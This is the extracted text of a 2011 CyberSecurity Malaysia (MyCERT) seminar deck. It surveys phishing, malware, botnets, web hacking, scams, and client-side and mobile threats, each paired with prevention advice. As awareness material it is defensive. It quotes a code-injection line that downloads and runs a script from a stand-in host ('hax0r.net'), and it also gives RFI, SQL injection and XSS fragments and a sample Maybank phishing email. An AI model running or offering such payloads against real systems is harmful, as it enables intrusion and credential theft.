Post on 30-Jan-2018
Ministry of Science,Technology & Innovation
Hacking AnatomySalahudin Wan Khairuzzaman
SEMINAR KESELAMATAN ICT
2011 KEMENTERIAN
KESIHATAN MALAYSIA
Securing Our CyberspaceCopyright © 2009 CyberSecurity Malaysia
24/3/2011
Salahudin Wan Khairuzzaman GCIH, CEH, ENSA
Intrusion Analyst
Malaysia Computer Emergency Response Team (MyCERT)
Malware Research
Cyber Early Warning
LebahNetAdvisory and
Alerts
Copyright © 2009 CyberSecurity Malaysia 2
Securing Our Cyberspace
Emerging Threats Threats
Visualization
MyCERT Statistics2010 and Early 2011
Copyright © 2009 CyberSecurity Malaysia 3
Securing Our Cyberspace
2010 and Early 2011
Cyber999™
MyCERT – Emergency Services
Incidents Handled in 2010Incidents Handled in 2010
Copyright © 2009 CyberSecurity Malaysia 4
Securing Our Cyberspace
Cyber999™
MyCERT – Emergency Services
Incidents Handled in 2011(JanIncidents Handled in 2011(Jan--Feb)Feb)
Copyright © 2009 CyberSecurity Malaysia 5
Securing Our Cyberspace
Spam Emails in 2010Spam Emails in 2010
Cyber999™
MyCERT – Emergency Services
Copyright © 2009 CyberSecurity Malaysia 6
Securing Our Cyberspace
Cyber999™
MyCERT – Emergency Services
Spam Emails in 2011(JanSpam Emails in 2011(Jan--Feb)Feb)
Copyright © 2009 CyberSecurity Malaysia 7
Securing Our Cyberspace
Cyber999™
MyCERT – Emergency Services
Botnet drones & Malware Infection in 2010Botnet drones & Malware Infection in 2010
Copyright © 2009 CyberSecurity Malaysia 8
Securing Our Cyberspace
Cyber999™
MyCERT – Emergency Services
Botnet drones & Malware Infection in 2010(JanBotnet drones & Malware Infection in 2010(Jan--Feb)Feb)
Copyright © 2009 CyberSecurity Malaysia 9
Securing Our Cyberspace
Cyber999™
MyCERT – Emergency Services
Honeynet Project Incidents in 2010Honeynet Project Incidents in 2010
Copyright © 2009 CyberSecurity Malaysia 10
Securing Our Cyberspace
Cyber999™
MyCERT – Emergency Services
Honeynet Project Incidents in 2011(JanHoneynet Project Incidents in 2011(Jan--Feb)Feb)
Copyright © 2009 CyberSecurity Malaysia 11
Securing Our Cyberspace
Technical and Global
Co-
Copyright © 2009 CyberSecurity Malaysia 12
Securing Our Cyberspace
Co-ordination
Technical Co-ordination
ISPsCyber
National Cooperation
Copyright © 2009 CyberSecurity Malaysia 13
Securing Our Cyberspace
VendorsLaw Enforcement, Authorities
Regulators
ISPsCyber SecurityExperts
MCMC
DELLDELLIBMIBM
gcert
Technical Coordination Centre
Copyright © 2009 CyberSecurity Malaysia 14
Securing Our Cyberspace
International Collaboration
European Government CSIRTs Group
(EGC)
European Network and Information Security Agency(ENISA)
MyCERT is an SC member
Organization of American States (OAS)
Forum of Incident Response Teams
Copyright © 2009 CyberSecurity Malaysia 15
Securing Our Cyberspace
(ENISA)
“OIC CYBER EMERGENCY RESPONSE TEAM”
Pakistan
Saudi
Tunisia
Malaysia
UAE
Indonesia
Nigeria
Morocco
Brunei
Bahrain
Bangladesh
Oman
EgyptPakistanQatar
Syria Kuwait
Jordan
OIC-CERT Task Force Member
Organization of Islamic Countries Computer Emergency Response Teams
States (OAS) CERT
Turkey
Home
Current Trend and Threats
Overview
� Phishing
�Malware
� Botnet
�Web Hacking
Copyright © 2009 CyberSecurity Malaysia 16
Securing Our Cyberspace
�Web Hacking
� Scam
�Client Side Attack
�Mobile Devices
What threat is this?
Copyright © 2009 CyberSecurity Malaysia 17
Securing Our Cyberspace
More examples..
Copyright © 2009 CyberSecurity Malaysia 18
Securing Our Cyberspace
More examples..
Copyright © 2009 CyberSecurity Malaysia 19
Securing Our Cyberspace
Phishing
Copyright © 2009 CyberSecurity Malaysia 20
Securing Our Cyberspace
Phishing
Phishing
� Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication[source: wikipedia]
Copyright © 2009 CyberSecurity Malaysia 21
Securing Our Cyberspace
� Still works today
� Targeting favourite banks in Malaysia / international
� Uses long URL that masquerading the original website
Phishing Methodology
11
33
Malicious
Hackers
INTERNET
Copyright © 2009 CyberSecurity Malaysia 22
Securing Our Cyberspace
22
44
Victim
Real
Website
Fake
Website
Phishing
Copyright © 2009 CyberSecurity Malaysia 23
Securing Our Cyberspace
That’s old phishing attack…..Let see how hackers redefine their tactics
Copyright © 2009 CyberSecurity Malaysia 24
Securing Our Cyberspace
Same Phishing Methodology
11
33
Malicious
Hackers
INTERNET
Copyright © 2009 CyberSecurity Malaysia 25
Securing Our Cyberspace
22
44
Victim
Real
Website
Fake
Website
We are hereby notifying you that we've recently suffered a DDos-Attack on one of
our's Online Banking server. For security reasons you must complete the next steps
to verify the integrity of your Maybank account. If you fail to complete the
verification in the next 24 hours your account will be suspended.
Here's how to get started:
1. Log in to Maybank online account (click here).
2. You must request for TAC via Maybank online banking - your TAC
will be sent via SMS to the mobile phone number you registered.
https://www.maybank2u.com.my/mbb/m2u/common/M2ULogin.do
Phishing Redefined
Copyright © 2009 CyberSecurity Malaysia 26
Securing Our Cyberspace
(you can find the "Request a TAC" button in the Utilities menu of
your account)
3. Logout from your account and close the browser.
4. When you have received the TAC (Transaction Authorization Code) on
your mobile phone, go to our secured verification server and
submit the requested information (Username, password and TAC).
to go on our secured server. (click here)
5. Please allow 48 hours for processing.
Please comply and thanks for understanding.
***This is an automated message, please do not reply***
http://static-217-133-89-90.clienti.tiscali.it//
Phishing Website –Username, Password & Transaction Authorization Code
Copyright © 2009 CyberSecurity Malaysia 27
Securing Our Cyberspace
Phishing
Does it really works?
Copyright © 2009 CyberSecurity Malaysia 28
Securing Our Cyberspace
Does it really works?
Phishing
Copyright © 2009 CyberSecurity Malaysia 29
Securing Our Cyberspace
Prevention
Copyright © 2009 CyberSecurity Malaysia 30
Securing Our Cyberspace
Prevention
Initiative from provider itself..
Copyright © 2009 CyberSecurity Malaysia 31
Securing Our Cyberspace
Phishing : Prevention
� Do not respond to e-mails requesting for your personal information
� Do not open attachments or download files
� Do not click on links provided in e-mails.
� DontPhishMe add-ons in Mozilla Firefox and Chrome
Copyright © 2009 CyberSecurity Malaysia 32
Securing Our Cyberspace
� https://addons.mozilla.org/en-US/firefox/addon/dontphishme/
� Netcraft Anti-Phishing toolbar� http://toolbar.netcraft.com/
� Report to MyCERT by forwarding the email to mycert@mycert.org.my
DontPhishMe
� Below is the list of supported online banking websites:
o * Maybank2u
o * Cimbclicks
o * Public Bank
o * Bank Rakyat
o * Bank Islam
Copyright © 2009 CyberSecurity Malaysia 33
Securing Our Cyberspace
o * Bank Islam
o * HSBC
o * EON Bank
o * UOB
o * AMBank
o * OCBC
o * RHB
o * Citibank
o * Standard Chartered Bank
o * Al Rajhi Bank
o * Affin Bank
DontPhishMe screenshots
Copyright © 2009 CyberSecurity Malaysia 34
Securing Our Cyberspace
DontPhishMe screenshots
Copyright © 2009 CyberSecurity Malaysia 35
Securing Our Cyberspace
What threat is this?
Copyright © 2009 CyberSecurity Malaysia 36
Securing Our Cyberspace
Copyright © 2009 CyberSecurity Malaysia 37
Securing Our Cyberspace
Malware
Malware
�A computer program created with malicious intents.
� It performs malicious tasks:� Stealing your identity
� Key logging
Disrupt system
Copyright © 2009 CyberSecurity Malaysia 38
Securing Our Cyberspace
� Disrupt system
� Damage data
� Attack other computers
Malware
� We can get infected by malware from almost everywhere:
� Web (drive by download, web exploitation, flash)
� Fake antivirus
� Email (email attachment, links)
� Files (pdf, doc, jpeg, etc.etc [file exploitation])
� Video/Mp3 (fake codec, file exploitation)
Copyright © 2009 CyberSecurity Malaysia 39
Securing Our Cyberspace
� Video/Mp3 (fake codec, file exploitation)
� Portable hardisk
� Errr..your USB storage?
Malware
�Unpatched systems or systems with vulnerable applications will easily become target to malware.
�Malicious software includes� Trojan horse
� Virus
Worms
Copyright © 2009 CyberSecurity Malaysia 40
Securing Our Cyberspace
� Worms
A computer worm is a self-replicating malware computer program.
A Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system
A computer virus is a computer program that can copy itself and infect a computer
Malware: What MyCERT Observed?
� MyCERT have been collected more than 25K unique samples.
� Most of it are positive with detection from antivirus software.
� Using honeypot concept (low interaction) for collecting malware.
Copyright © 2009 CyberSecurity Malaysia 41
Securing Our Cyberspace
� Most likely coming from host which infected by sort of malware.
� Malware is normally distributed by IRC, FTP and HTTP
Threatexpert geographic
Copyright © 2009 CyberSecurity Malaysia 42
Securing Our Cyberspace
VirusTotal statistics
Copyright © 2009 CyberSecurity Malaysia 43
Securing Our Cyberspace
Malware: Scenario (Conficker)
Copyright © 2009 CyberSecurity Malaysia 44
Securing Our Cyberspace
Malware : Conficker : What MyCERT Observed?
Copyright © 2009 CyberSecurity Malaysia 45
Securing Our Cyberspace
Malware : Conficker : What MyCERT Observed?
Copyright © 2009 CyberSecurity Malaysia 46
Securing Our Cyberspace
Malware : Conficker : What MyCERT Observed?
Copyright © 2009 CyberSecurity Malaysia 47
Securing Our Cyberspace
Malware : Conficker : What MyCERT Observed?
Top Country
Copyright © 2009 CyberSecurity Malaysia 48
Securing Our Cyberspace
Malware : Conficker : What MyCERT Observed?
Top .my Domain Requested
Copyright © 2009 CyberSecurity Malaysia 49
Securing Our Cyberspace
Current trends
� Targeted attacks
o Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment
o spread using infected removable drives such as
Copyright © 2009 CyberSecurity Malaysia 50
Securing Our Cyberspace
o spread using infected removable drives such as USB flash drives
o designed to target only Siemens Supervisory Control And Data Acquisition (SCADA) systems
o Targeting 5 Iranian organizations - probable target widely suspected to be uranium enrichment infrastructure in Iran.
Prevention
Copyright © 2009 CyberSecurity Malaysia 51
Securing Our Cyberspace
Prevention
Malware : Prevention
� Patch.. Patch.. Patch.. and Patch (OS & Applications)
� Make sure Antivirus installed and up-to-date
� Stay away from illegal/questionable sites
� Be careful with mail attachments!
� Be careful with ‘autorun’ thumbdrive
Copyright © 2009 CyberSecurity Malaysia 52
Securing Our Cyberspace
� Be careful with ‘autorun’ thumbdrive
� Report to MyCERT : mycert@mycert.org.my
Botnet
Copyright © 2009 CyberSecurity Malaysia 53
Securing Our Cyberspace
Botnet
� Botnet is collection of compromised computers (called Zombie computers) running software, usually installed via worms, Trojan horses, or backdoors, under a common command-and-control (C&C) infrastructure.
�Use to perform DDoS, Automated hacking,
Copyright © 2009 CyberSecurity Malaysia 54
Securing Our Cyberspace
�Use to perform DDoS, Automated hacking, Spamming, etc..etc..
Botnet : Scenario
1. Botnet operator sends out viruses or worms• infect ordinary users [trojan application is the
bot]
2. The bot on the infected PC logs into an IRC server
Copyright © 2009 CyberSecurity Malaysia 55
Securing Our Cyberspace
• Server is known as the command-and-control server
3. Spammer gets access to botnet from operator
4. Spammer sends instructions to the infected PCs
5. Infected PCs send out spam messages
Botnet : DDoS
Copyright © 2009 CyberSecurity Malaysia 56
Securing Our Cyberspace
Web Hacking
Copyright © 2009 CyberSecurity Malaysia 57
Securing Our Cyberspace
Web Security Threats
R F I
Copyright © 2009 CyberSecurity Malaysia 58
Securing Our Cyberspace
CODE INJECTIONlala.php?Id=1&cmd=uname –a || wget hax0r.net/ipwn3du.sh && ./ipwn3du.sh &&
rm ipwn3du.sh
What threat is this?
Copyright © 2009 CyberSecurity Malaysia 59
Securing Our Cyberspace
Web Defacement
Web defacement is an attack on a website that changes
the visual appearance of the site.
These are typically the work of a system cracker, who
break into a web server and replace the hosted website
Copyright © 2009 CyberSecurity Malaysia 60
Securing Our Cyberspace
break into a web server and replace the hosted website
with on of their own.
A message is often left on the webpage along with a shout
out to his or her friends.
Web Hacking
When attacker successfully attack a website, they
can:
oChange of view the disclosed information on the
sites
Copyright © 2009 CyberSecurity Malaysia 61
Securing Our Cyberspace
oChange account information , edit the database.
oRemove the entire websites , drop database etc
etc.
oDeface the web pages
oMany more..
Web Hacking
�Most Common methods:� RFI
� [ex. drop sites: =http://www.example/malicious-code.txt??]
� SQL Injection� Union
� Select
Copyright © 2009 CyberSecurity Malaysia 62
Securing Our Cyberspace
� Select
� %20
� %27
� XSS - enables malicious attackers to inject client-side script into web pages viewed by other users� <SCRIPT>alert("XSS")</SCRIPT
What threat is this?
� This is what we see:
Copyright © 2009 CyberSecurity Malaysia 63
Securing Our Cyberspace
Remote File Inclusion + Steganography
� This is what attacker have
Copyright © 2009 CyberSecurity Malaysia 64
Securing Our Cyberspace
Prevention
Copyright © 2009 CyberSecurity Malaysia 65
Securing Our Cyberspace
Prevention
Web Hacking : Prevention
� Patch.. Patch.. Patch.. and Patch (OS & Applications)
� Secure coding practice� http://www.mycert.org.my/en/resources/web_security/main/main/detail/573/index.html
� Secure configurations
� Modified php.ini
� allow_url_include=off
Copyright © 2009 CyberSecurity Malaysia 66
Securing Our Cyberspace
� allow_url_include=off
� register_globals=off
� 3rd party applications (GreenSQL, PHP-IDS, modSecurity, etc2)
� Web Application Firewall (WAF)
� Log analysis (time to time)
� Report to MyCERT : mycert@mycert.org.my
� By having proper network design/firewall rules, we can reduce the threat as well:
o DMZ (web server) are not allow to connect to IRC protocol
o DMZ (web server) are not allow to establish
Prevention : Network Design
Copyright © 2009 CyberSecurity Malaysia 67
Securing Our Cyberspace
o DMZ (web server) are not allow to establish connection to unknown sites/ftp server
o DMZ (web server) are not allow to establish connection to search engine
o Proxi’ed web server?
What threat is this?
� Dear Sir/Madam, Congratulations! We are pleased to announce you as one of the 3 lucky winners in the FLASH MEGA LOTTERY draw held today. All 3 winning addresses were randomly selected from a batch of 5,000,000 international
Copyright © 2009 CyberSecurity Malaysia 68
Securing Our Cyberspace
selected from a batch of 5,000,000 international emails. Your email address emerged alongside to others as a 3rd category winner in this month's draw. Consequently, you have therefore been approved for a total pay out of $1,950,000.00 Dollars (One Million Nine Hundred and Fifty Thousand United State Dollars) only.
Scam
� May related to phishing
� Nigerian or Russian Scam
� Normally through email with title “From the desk of Mr [name]” or “Your Assistance is needed”
� Email-Hijacking / Friends Scams
Copyright © 2009 CyberSecurity Malaysia 69
Securing Our Cyberspace
� Email-Hijacking / Friends Scams
� Purchasing goods and online.
� Lottery scam.
� Pet scam.
� Fake job offer.
� Etc etc.. You name it!
Prevention
Copyright © 2009 CyberSecurity Malaysia 70
Securing Our Cyberspace
Prevention
� Do not expose your 16 digits card number
� Customer Card ID Number (CID or CVV2 number)
� Expiry Date
� This scam is normally through
Prevention
Copyright © 2009 CyberSecurity Malaysia 71
Securing Our Cyberspace
� This scam is normally through
phone.
� Google out your full name to protect your information.
� Do not respond to anonymous E-mail
� Bill Gates don’t give free ipod through the internet.
Prevention
Copyright © 2009 CyberSecurity Malaysia 72
Securing Our Cyberspace
internet.
� Make sure you follow up
on any process or procedures.
Prevention
� http://www.hoax-slayer.com/
Hoax-Slayer is dedicated to debunking email hoaxes, thwarting Internet scammers, combating spam, and educating web users about email and Internet security issues
Copyright © 2009 CyberSecurity Malaysia 73
Securing Our Cyberspace
Internet security issues
What’s now/next?
Copyright © 2009 CyberSecurity Malaysia 74
Securing Our Cyberspace
What’s now/next?
Client Side Attack
Copyright © 2009 CyberSecurity Malaysia 75
Securing Our Cyberspace
Client Side Attack
�Target vulnerabilities in client applications that interact with a malicious server or process malicious data.
Copyright © 2009 CyberSecurity Malaysia 76
Securing Our Cyberspace
Client Side Attack
� Common Target� Browser (IE, Firefox, Chrome, Safari)
� PDF Reader (Adobe Acrobat, Foxit)
� Flash Player
� Multimedia Plugin (Java, Quicktime, ActiveX)
� Microsoft Office Apps (Excel, PowerPoint)
Copyright © 2009 CyberSecurity Malaysia 77
Securing Our Cyberspace
� Microsoft Office Apps (Excel, PowerPoint)
Client Side Attack
� Used in ‘Targeted Attack’
o Scenario: Receive file with attachment from boss
� Normally used current propaganda to conduct social engineering:
o US Presidential Election
o Tibetan Movement
Copyright © 2009 CyberSecurity Malaysia 78
Securing Our Cyberspace
o Tibetan Movement
o Pharmacy spam
o Swine Flu
o Michael Jackson
Client Side Attack : Acrobat Reader (1)
Copyright © 2009 CyberSecurity Malaysia 79
Securing Our Cyberspace
Client Side Attack : Acrobat Reader (2)
Copyright © 2009 CyberSecurity Malaysia 80
Securing Our Cyberspace
Client Side Attack : Advisories 2010
� MA-261.122010 : MyCERT Alert - Critical Vulnerability in Microsoft Internet Explorer
� MA-257.112010 :Multiple Critical Vulnerabilities in Adobe Reader
� MA-256.112010 : Critical Vulnerability in Microsoft Internet Explorer
� MA-255.102010 : MyCERT Alert - Critical Vulnerability in Adobe Flash Player
� MA-254.102010 : MyCERT Alert - Critical vulnerability in Mozilla Firefox
� MA-253.102010 : MyCERT Alert - Critical Vulnerability in Adobe Shockwave Player
� MA-252.102010 : MyCERT Alert - Multiple Critical Vulnerabilities in Oracle Java SE and Java for Business
� MA-250.092010 : MyCERT Alert - Critical Vulnerability in Adobe Flash Player
� MA-249.092010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader
� MA-246.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Shockwave Player
� MA-245.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Acrobat and Reader
� MA-243.082010 : MyCERT Alert - Multiple Critical Vulnerabilities in Adobe Flash Player
Copyright © 2009 CyberSecurity Malaysia 81
Securing Our Cyberspace
� MA-242.082010 : MyCERT Alert - Latest Patch for Microsoft Vulnerabilities (August 2010)
� MA-234.062010: MyCERT Alert -Critical Vulnerabilities in Adobe Flash Player, Adobe Reader and Acrobat
� MA-232.052010: MyCERT Alert -Multiple Critical Vulnerabilities in Adobe Shockwave Player
� MA-230.052010: MyCERT Alert - Critical Vulnerability in Safari Web Browser
� MA-229.042010: MyCERT Advisory -Vulnerability in Microsoft Sharepoint Could Allow Elevation of Privilege
� MA-226.042010: MyCERT Alert - Multiple Critical Vulnerability in Adobe Acrobat and Reader
� MA-225.042010: MyCERT Alert - Oracle JRE Java Platform SE and Java Deployment Toolkit Plugins Code Execution Vulnerabilities
� MA-221.032010 : MyCERT Alert – Critical Vulnerability in Microsoft Internet Explorer
� MA-218.032010 : MyCERT Alert - Microsoft Windows Help File Code Execution Vulnerability Within Internet Explorer via VBScript
� MA-217.022010:MyCERT Alert - Critical Vulnerability in Adobe Download Manager
� MA-216.022010: MyCERT Alert - Critical Vulnerability in Adobe Acrobat and Adobe Reader
� MA-214.022010: MyCERT Alert - Information disclosures vulnerabilities in Internet Explorer
� MA-212.012010: MyCERT Alert - Google Chrome Multiple Critical Vulnerabilities
Prevention
Copyright © 2009 CyberSecurity Malaysia 82
Securing Our Cyberspace
Prevention
Client Side Attack : Prevention
� Patch.. Patch.. Patch.. and Patch (OS & Applications)
� Make sure Antivirus installed and up-to-date
� Be careful with mail attachments and URL!
� Stay away from questionable sites
� Use extra protection :) (Firewall, F-Secure Exploit
Copyright © 2009 CyberSecurity Malaysia 83
Securing Our Cyberspace
� Use extra protection :) (Firewall, F-Secure Exploit Shield, Google Safe Browsing API (about:config))
� Report to MyCERT : mycert@mycert.org.my
Google safe browsing API
Copyright © 2009 CyberSecurity Malaysia 84
Securing Our Cyberspace
Mobile Devices
Copyright © 2009 CyberSecurity Malaysia 85
Securing Our Cyberspace
Mobile Devices
�Target mobile phone with specific Operating System
�Very recent
�Attacking method:� SMS
Copyright © 2009 CyberSecurity Malaysia 86
Securing Our Cyberspace
� MMS
� Attachment
� Bluetooth
� Warez/free applications downloaded (not official)
Mobile Devices : Transmitter.C (malware)
Copyright © 2009 CyberSecurity Malaysia 87
Securing Our Cyberspace
Mobile Malware
Copyright © 2009 CyberSecurity Malaysia 88
Securing Our Cyberspace
Skull.D Commwarrior BlankfontDoomboot
Mobile Malware (cont’d)
Copyright © 2009 CyberSecurity Malaysia 89
Securing Our Cyberspace
Mobile Devices
�Affected Product� iPhone (Safari browser)
� Symbian (SMS, MMS, Warez, File)
� Windows Mobile [HTC] (Bluetooth, Warez)
� BlackBerry (Attachment)
� Android devices
Copyright © 2009 CyberSecurity Malaysia 90
Securing Our Cyberspace
� Android devices
Mobile Devices : Advisories
MA-177.072009: MyCERT Alert - 0day in HTC (Windows Mobile) OBEX FTP Service - Directory TraversalMA-176.072009: MyCERT Alert - 0day in Symbian S60 (Nokia) Firmware Media Codecs - Multiple Memory Corruption VulnerabilitiesMA-174.072009: MyCERT Alert - Transmitter.C Mobile Malware AdvisoryMA-193.092009: MyCERT Alert - Critical Vulnerability in iPhone and iPod Touch Operating SystemMA-213.022010: MyCERT Alert - Latest Security Update for iPhone OS and iPod Touch (February 2010)MA-274.032011 : MyCERT Alert - Critical Vulnerability in Webkit Browser Engine for BlackBerry
Copyright © 2009 CyberSecurity Malaysia 91
Securing Our Cyberspace
Prevention
Copyright © 2009 CyberSecurity Malaysia 92
Securing Our Cyberspace
Prevention
Client Side Attack : Prevention
� Patch.. Patch.. Patch.. and Patch (if available)
� Do not open questionable SMS, MMS or files
� Do not browse to unknown websites received via SMS or MMS from known or unknown person
� Do not download and install unknown or untrusted third party application that is uploaded into the
Copyright © 2009 CyberSecurity Malaysia 93
Securing Our Cyberspace
third party application that is uploaded into the website and forum
� Do not to accept pairing or connection requests from unknown sources
� It is recommended to use Antivirus
� Report to MyCERT : mycert@mycert.org.my
Google search tips
� “keywords” filetype:doc
� “keywords” site:my
� “keywords” inurl:google.com
� “keywords” inurl:phpmyadmin
� Phrase search “ “
� Calculator
Copyright © 2009 CyberSecurity Malaysia 94
Securing Our Cyberspace
� Calculator
� Currency Converter
� word1 OR word2 --finds pages that include either word
� Word1 AND word2 --finds pages that include both word
� Term you want to exclude (-) (e.g word1 -word2)
� Term you want to include (+) (e.g word1 +word2)
Conclusion
Copyright © 2009 CyberSecurity Malaysia 95
Securing Our Cyberspace
Conclusion
Security isOUR
Small Issues
BIG Problem
Copyright © 2009 CyberSecurity Malaysia 96
Securing Our Cyberspace
OURResponsibility
Mode of Incident Referrals
1. Email� cyber999@cybersecurity.my� mycert@mycert.org.my
2. Phone� +603 8992 6969� +1300-88-2999
3. Fax� +603 8945 3442
Copyright © 2009 CyberSecurity Malaysia 97
Securing Our Cyberspace
� +603 8945 3442
4. SMS� +6019 281 3801
5. Mobile (24x7)� +6019 266 5850
6. Online – http://www.mycert.org.my
1. Office Hours – MYT 0830 - 1730
Q & A
Copyright © 2009 CyberSecurity Malaysia 98
Securing Our Cyberspace
Q & A
THANK YOU
salahudin@cybersecurity.my
cyber999@cybersecurity.my
mycert@mycert.org.my
for
for
forhttp://www.cybersecurity.my
http://www.mycert.org.my
http://www.esecurity.org.my
Corporate website
Technical website
Our Websites and emails
Copyright © 2009 CyberSecurity Malaysia 99
Securing Our Cyberspace
for
cyber999@cybersecurity.my → for incidence reporting
info@cybersecurity.my → for general inquiries
http://www.esecurity.org.myAwareness Portal
http://cnii.cybersecurity.my for
Our Corporate Website:
Copyright © 2009 CyberSecurity Malaysia 100
Securing Our CyberspaceSecuring Our Cyberspace Copyright © 2008 CyberSecurity Malaysia